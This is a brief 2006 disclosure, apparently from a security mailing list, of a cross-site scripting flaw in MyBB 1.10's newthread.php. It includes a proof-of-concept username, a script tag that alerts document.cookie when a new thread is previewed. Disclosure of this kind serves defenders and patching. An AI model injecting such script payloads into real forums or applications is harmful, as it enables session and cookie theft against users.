Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Vulnerabilities in SPIP

XMB Forum 1.9.5-Final XSS

interaktiv.shop v.5 XSS vuln.

[SA19578] MAXdev MD-Pro "topicid" SQL Injection Vulnerability

From:	o.y.6_(at)_hotmail.com <o.y.6_(at)_hotmail.com>
Date:	10.04.2006
Subject:	MyBB 1.10 'newthread.php' < CrossSiteScripting >

MyBB 1.10 'newthread.php' < CrossSiteScripting >

       [ Devil-00 | D3vil-0x1 ]

[*] Conditions [*]
1- your unregisterd user
2- you have permissions to do newthread

[---------------]

do newthread with this username :-

<script>alert(document.cookie);</script>D3vil-0x1

Then Preview it ;)

[---------------]